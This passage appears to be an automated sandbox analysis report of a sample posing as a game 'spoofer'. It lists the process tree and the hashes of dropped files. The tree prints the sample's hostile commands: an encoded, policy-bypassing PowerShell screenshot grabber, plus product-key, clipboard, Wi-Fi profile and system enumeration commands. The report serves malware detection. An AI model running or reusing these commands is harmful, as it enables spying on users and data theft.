                                                                                                                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                          2⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5168
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                        1⤵
                                                                                                                          PID:5512
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic path win32_VideoController get name
                                                                                                                          1⤵
                                                                                                                          • Detects videocard installed
                                                                                                                          PID:5000
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                          1⤵
                                                                                                                            PID:5580
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                            1⤵
                                                                                                                              PID:5548
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                              1⤵
                                                                                                                                PID:5108
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                1⤵
                                                                                                                                  PID:2860
                                                                                                                                • C:\Windows\system32\systeminfo.exe
                                                                                                                                  systeminfo
                                                                                                                                  1⤵
                                                                                                                                  • Gathers system information
                                                                                                                                  PID:4340
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell Get-Clipboard
                                                                                                                                  1⤵
                                                                                                                                    PID:4048
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh wlan show profile
                                                                                                                                    1⤵
                                                                                                                                      PID:1408
                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                      tree /A /F
                                                                                                                                      1⤵
                                                                                                                                        PID:3020
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                        1⤵
                                                                                                                                          PID:4300
                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                          tasklist /FO LIST
                                                                                                                                          1⤵
                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4436
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:1896
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:3004
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:3084
                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                          tasklist /FO LIST
                                                                                                                                          1⤵
                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2820
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:3220
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:2128
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:4700
                                                                                                                                        • C:\Windows\SysWOW64\WindowsInput.exe
                                                                                                                                          "C:\Windows\SysWOW64\WindowsInput.exe" --install
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4048
                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                          find /i /v "certutil"
                                                                                                                                          1⤵
                                                                                                                                            PID:3876
                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                            find /i /v "md5"
                                                                                                                                            1⤵
                                                                                                                                              PID:5140
                                                                                                                                            • C:\Windows\system32\certutil.exe
                                                                                                                                              certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\NewVersion.exe" MD5
                                                                                                                                              1⤵
                                                                                                                                                PID:5936
                                                                                                                                              • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:4300

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe

                                                                                                                                                Filesize

                                                                                                                                                186KB

                                                                                                                                                MD5

                                                                                                                                                cae7381a6fa7e321cad7a97f252db52a

                                                                                                                                                SHA1

                                                                                                                                                387b3bbf27514eb55d995e93d2e6467a9b935efc

                                                                                                                                                SHA256

                                                                                                                                                5fcf5fc5ab68cf9f41931614dd9f178f383ab68525002e70ed15628731d86f97

                                                                                                                                                SHA512

                                                                                                                                                13ce9c7433e29c256617336aea5159cecff307c62e9bdfeaaf7d5715bef8827efa835d24d1bb80b4bc2737d0a8edabb8540242ae649d0d385e52c0baba25c238

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE

                                                                                                                                                Filesize

                                                                                                                                                111KB

                                                                                                                                                MD5

                                                                                                                                                51ae04a1f94c43bc3cdbe57ab789b955

                                                                                                                                                SHA1

                                                                                                                                                c73cd0cc75fd0ad05d6ac2c2651899ae47fd2c0c

                                                                                                                                                SHA256

                                                                                                                                                8e539cc20073dd335eb195c56dae58c43e69b813a984f2fa76421a0880da5c1d

                                                                                                                                                SHA512

                                                                                                                                                e566e3ad4bc43e46fb005458c68472627fd9b2dca5c69808017203519b22d7991cdc90d4e2ca7d3f7f57c1b52188959cda1109300bfb79875ee5a1f5b477a8ee

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE

                                                                                                                                                Filesize

                                                                                                                                                88KB

                                                                                                                                                MD5

                                                                                                                                                ac93e548970c829e29d24fbfa617bda8

                                                                                                                                                SHA1

                                                                                                                                                5d0f9029d1bea0a6035be389320a9c138ee1ea97

                                                                                                                                                SHA256

                                                                                                                                                bcd2a1b0a794166cf50f8381d7e45b9194e5d224dff983962bf6c332408b9b85

                                                                                                                                                SHA512

                                                                                                                                                9afa776725128f50657b1b899a056c25189e1bdb944d675b4c4baa5bf6dd2e04a86053ed4c81bee84798be3070f9da7479f60bc1bf14307dfd1ef851ae121b04

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE

                                                                                                                                                Filesize

                                                                                                                                                11KB

                                                                                                                                                MD5

                                                                                                                                                c6aa1539bf7647cab050d4a16866c95e

                                                                                                                                                SHA1

                                                                                                                                                0f1276638114701301ede261e2960da8fbe75877

                                                                                                                                                SHA256

                                                                                                                                                f7269e87f1a04976eebf7b7ce961c07ea281e9f899273f1b44ac80e75a1bdd2a

                                                                                                                                                SHA512

                                                                                                                                                1d0c8dddaca1c81579de92cc9ec3f12b533f2ca8d145239b4d2ac8c915b7c5dab3d53e166d5598a791e2f03238aa47da6d15ae2ed6eb79b39b810fb315c73fc6

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

                                                                                                                                                Filesize

                                                                                                                                                982KB

                                                                                                                                                MD5

                                                                                                                                                048ad741c2b67fdb9e84242619b4df16

                                                                                                                                                SHA1

                                                                                                                                                d0164aaca9049979baa20b612792b0a8298e9771

                                                                                                                                                SHA256

                                                                                                                                                bf7feab7469460193b326a79925463eecfd9eb5583a645eaa2be6a5a63c5412a

                                                                                                                                                SHA512

                                                                                                                                                50700c94ae32f3417136848f688ef1ad4abca3f559821eb74edf516bc5ca4092e49c4858edfb34ef473f587346e3ec14a109f37910c28a7a4db3c446662872e6

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

                                                                                                                                                Filesize

                                                                                                                                                120KB

                                                                                                                                                MD5

                                                                                                                                                d88ac8f2c0b19fa0809dcd74bd0f0bbf

                                                                                                                                                SHA1

                                                                                                                                                0e9d942e9a3cc0c52840d518d92851577b925fab

                                                                                                                                                SHA256

                                                                                                                                                aaf2039046f8df3f6d0f53711d88cbb29d40bf0e60877a2a018579a7df7ccefc

                                                                                                                                                SHA512

                                                                                                                                                ebb14c8da47a97b6ab5028c1dbf1fbd5ccd9e823aefc2a78406bcf908ab77066ac84894b08c9d6fbb99d9158035b00a17eb92ccd8645d88c9925c8d3e9d1a1c8

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

                                                                                                                                                Filesize

                                                                                                                                                936KB

                                                                                                                                                MD5

                                                                                                                                                f9bac01bcd1f55e7767be23b1657cd7a

                                                                                                                                                SHA1

                                                                                                                                                3f216edaa596d87eb627da1ff63cea4e6db02e90

                                                                                                                                                SHA256

                                                                                                                                                6ae7b4b36230d85103ea067fc1da2a12b5d2285586ffd44607cffa91f8aeb549

                                                                                                                                                SHA512

                                                                                                                                                91c3d6d035d36c8592e38a298b6adaa67a9d70500c50cabd5c4b76d74c765052cc54f5806693c92ccb4803728bb68d82af3b53088a7398aa8657daae4da9d0fa

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

                                                                                                                                                Filesize

                                                                                                                                                108KB

                                                                                                                                                MD5

                                                                                                                                                bd7087501b1f8fbc68933985b0596cb2

                                                                                                                                                SHA1

                                                                                                                                                029c6e1f51da888fd894196825da82e0f557eea4

                                                                                                                                                SHA256

                                                                                                                                                2bc3ce4b1519bca5ab75566c59d5ce8dab066b0d80ba6030ff14b86da75fbbec

                                                                                                                                                SHA512

                                                                                                                                                7de823d3ad716d1a2e7d654e404d1e51f1a18094d56562cf40a68a039a5c05edc54c8eda4644b337cbdfd4d78876ec8ef2007659cec18ee249f3b6562dc9e3ce

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

                                                                                                                                                Filesize

                                                                                                                                                1006KB

                                                                                                                                                MD5

                                                                                                                                                6319e3c3aac51e0b93fc5eb6f73eaf13

                                                                                                                                                SHA1

                                                                                                                                                0b95aab1d1dffb3e9de3d3fbc6eed33944500d67

                                                                                                                                                SHA256

                                                                                                                                                050ecb4fc15b7f6104166f9029d0f81665c8e2c4ec6c2d157bac3de661830b5a

                                                                                                                                                SHA512

                                                                                                                                                524fe9887f4d7f1761d9c787254040e1446b0a197510eaa778922f3e68b9f9598f59baaf0d5ed536bcb198663d7aac87a9db3f97c00e72ad5f39f39a0b3f4f98

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

                                                                                                                                                Filesize

                                                                                                                                                824KB

                                                                                                                                                MD5

                                                                                                                                                8f9b13a7a888a98f4c7f499a61d7119a

                                                                                                                                                SHA1

                                                                                                                                                9a92bfa63828a3079fb1f2b6785fdebe0e1df9ef

                                                                                                                                                SHA256

                                                                                                                                                a3dac8ecb1684128cfb3cc9f8eebf6c1ac9b3930a5bee7569a5e7d291c971920

                                                                                                                                                SHA512

                                                                                                                                                f45a9b10698eee5a5f18e673dbea66759fe15fb97893d9897ff214d1898e0eaa8fb2cd72c1b576815c5d278924cce48ec3dc28aaccfc2e8205508f3dd0619694

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

                                                                                                                                                Filesize

                                                                                                                                                1016KB

                                                                                                                                                MD5

                                                                                                                                                34d8b61bc098d8f6ba428730e253430f

                                                                                                                                                SHA1

                                                                                                                                                5b79f3d6b05bd08092071368da55443e58425e6f

                                                                                                                                                SHA256

                                                                                                                                                66cd0c6804bd48a0ae9af5d87d62baad4a1502d9be96f9660240b58ef88be25b

                                                                                                                                                SHA512

                                                                                                                                                c5efc0a88f9937a4d85e1ee39b022329eb7868865d8e91e2ca6e6350dfbe853c84cf135a1bcbec6023c63f89fbb28e6bc6d2563c90802dc5d6d6c65206743cd0

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

                                                                                                                                                Filesize

                                                                                                                                                1023KB

                                                                                                                                                MD5

                                                                                                                                                e69d6c8b976a3780a533a640e50c9e2d

                                                                                                                                                SHA1

                                                                                                                                                549cd90363a9ea2083db3d8808700c0f953935c7

                                                                                                                                                SHA256

                                                                                                                                                26e248ae4ad08efdf6aec6c7059dec7624bbc729ad1f2cc4f5bdadb5c869a9cd

                                                                                                                                                SHA512

                                                                                                                                                a4c1a04875107f724292e8fc8a87a58ef5ce871d3bea849d25595ac093e977fb98d5fe613842e4913e0424b5cd8714fa42510091e290fe223e230962a27f0f73

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

                                                                                                                                                Filesize

                                                                                                                                                61KB

                                                                                                                                                MD5

                                                                                                                                                942d7fd1c545425276acfe00b9fc48a8

                                                                                                                                                SHA1

                                                                                                                                                d546ad929ca7d0ff47c2e0758cfe485b57c4c86f

                                                                                                                                                SHA256

                                                                                                                                                d84606ea442a7c5f1fd35e2fc0b2c8d05f28b7007a5e1f9e96a9c2672bb6a693

                                                                                                                                                SHA512

                                                                                                                                                2418afd44c9b4b2ad82390ae39a73e0566d88ee8657a99c1c7eadd36113dd0124a349b30d4ce51125fc381a2d08838df356d272334ba71ceaa00d7ccb3b347bc

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\VCRUNTIME140.dll

                                                                                                                                                Filesize

                                                                                                                                                116KB

                                                                                                                                                MD5

                                                                                                                                                be8dbe2dc77ebe7f88f910c61aec691a

                                                                                                                                                SHA1

                                                                                                                                                a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                                                                                SHA256

                                                                                                                                                4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                                                                                SHA512

                                                                                                                                                0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\VCRUNTIME140.dll

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                                MD5

                                                                                                                                                30901d5a9be256e464bd2906f85ab367

                                                                                                                                                SHA1

                                                                                                                                                8b9bb9f385eb5e6efe41a18574609d6014117b25

                                                                                                                                                SHA256

                                                                                                                                                6bfbf431a45c0a2fbfa634689736e104cbc6daeba614e44de05b1ef4880c324b

                                                                                                                                                SHA512

                                                                                                                                                725c807a79c3f95bc291dfe956187534bcba10d291842f98d13dede5c6f2f1b7a55c657b2498de95ef1e780abf52de9257c57c82815b5a31770179e164d4f702

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\_ctypes.pyd

                                                                                                                                                Filesize

                                                                                                                                                59KB

                                                                                                                                                MD5

                                                                                                                                                1b06133298f03ff20e5d31cb3b0bca63

                                                                                                                                                SHA1

                                                                                                                                                0678e26f8d03e2ea0ba8d78d6d14809914d9c0a8

                                                                                                                                                SHA256

                                                                                                                                                e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d

                                                                                                                                                SHA512

                                                                                                                                                18c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                40ba4a99bf4911a3bca41f5e3412291f

                                                                                                                                                SHA1

                                                                                                                                                c9a0e81eb698a419169d462bcd04d96eaa21d278

                                                                                                                                                SHA256

                                                                                                                                                af0e561bb3b2a13aa5ca9dfc9bc53c852bad85075261af6ef6825e19e71483a6

                                                                                                                                                SHA512

                                                                                                                                                f11b98ff588c2e8a88fdd61d267aa46dc5240d8e6e2bfeea174231eda3affc90b991ff9aae80f7cea412afc54092de5857159569496d47026f8833757c455c23

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                c5e3e5df803c9a6d906f3859355298e1

                                                                                                                                                SHA1

                                                                                                                                                0ecd85619ee5ce0a47ff840652a7c7ef33e73cf4

                                                                                                                                                SHA256

                                                                                                                                                956773a969a6213f4685c21702b9ed5bd984e063cf8188acbb6d55b1d6ccbd4e

                                                                                                                                                SHA512

                                                                                                                                                deedef8eaac9089f0004b6814862371b276fbcc8df45ba7f87324b2354710050d22382c601ef8b4e2c5a26c8318203e589aa4caf05eb2e80e9e8c87fd863dfc9

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                71f1d24c7659171eafef4774e5623113

                                                                                                                                                SHA1

                                                                                                                                                8712556b19ed9f80b9d4b6687decfeb671ad3bfe

                                                                                                                                                SHA256

                                                                                                                                                c45034620a5bb4a16e7dd0aff235cc695a5516a4194f4fec608b89eabd63eeef

                                                                                                                                                SHA512

                                                                                                                                                0a14c03365adb96a0ad539f8e8d8333c042668046cea63c0d11c75be0a228646ea5b3fbd6719c29580b8baaeb7a28dc027af3de10082c07e089cdda43d5c467a

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                f1534c43c775d2cceb86f03df4a5657d

                                                                                                                                                SHA1

                                                                                                                                                9ed81e2ad243965e1090523b0c915e1d1d34b9e1

                                                                                                                                                SHA256

                                                                                                                                                6e6bfdc656f0cf22fabba1a25a42b46120b1833d846f2008952fe39fe4e57ab2

                                                                                                                                                SHA512

                                                                                                                                                62919d33c7225b7b7f97faf4a59791f417037704eb970cb1cb8c50610e6b2e86052480cdba771e4fad9d06454c955f83ddb4aea2a057725385460617b48f86a7

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                25KB

                                                                                                                                                MD5

                                                                                                                                                ea00855213f278d9804105e5045e2882

                                                                                                                                                SHA1

                                                                                                                                                07c6141e993b21c4aa27a6c2048ba0cff4a75793

                                                                                                                                                SHA256

                                                                                                                                                f2f74a801f05ab014d514f0f1d0b3da50396e6506196d8beccc484cd969621a6

                                                                                                                                                SHA512

                                                                                                                                                b23b78b7bd4138bb213b9a33120854249308bb2cf0d136676174c3d61852a0ac362271a24955939f04813cc228cd75b3e62210382a33444165c6e20b5e0a7f24

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                bcb8b9f6606d4094270b6d9b2ed92139

                                                                                                                                                SHA1

                                                                                                                                                bd55e985db649eadcb444857beed397362a2ba7b

                                                                                                                                                SHA256

                                                                                                                                                fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

                                                                                                                                                SHA512

                                                                                                                                                869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                18KB

                                                                                                                                                MD5

                                                                                                                                                bfffa7117fd9b1622c66d949bac3f1d7

                                                                                                                                                SHA1

                                                                                                                                                402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

                                                                                                                                                SHA256

                                                                                                                                                1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

                                                                                                                                                SHA512

                                                                                                                                                b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                d584c1e0f0a0b568fce0efd728255515

                                                                                                                                                SHA1

                                                                                                                                                2e5ce6d4655c391f2b2f24fc207fdf0e6cd0cc2a

                                                                                                                                                SHA256

                                                                                                                                                3de40a35254e3e0e0c6db162155d5e79768a6664b33466bf603516f3743efb18

                                                                                                                                                SHA512

                                                                                                                                                c7d1489bf81e552c022493bb5a3cd95ccc81dbedaaa8fdc0048cacbd087913f90b366eeb4bf72bf4a56923541d978b80d7691d96dbbc845625f102c271072c42

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

                                                                                                                                                6168023bdb7a9ddc69042beecadbe811

                                                                                                                                                SHA1

                                                                                                                                                54ee35abae5173f7dc6dafc143ae329e79ec4b70

                                                                                                                                                SHA256

                                                                                                                                                4ea8399debe9d3ae00559d82bc99e4e26f310934d3fd1d1f61177342cf526062

                                                                                                                                                SHA512

                                                                                                                                                f1016797f42403bb204d4b15d75d25091c5a0ab8389061420e1e126d2214190a08f02e2862a2ae564770397e677b5bcdd2779ab948e6a3e639aa77b94d0b3f6c

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35362\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                Filesize

                                                                                                                                                21KB

                                                                                                                                                MD5

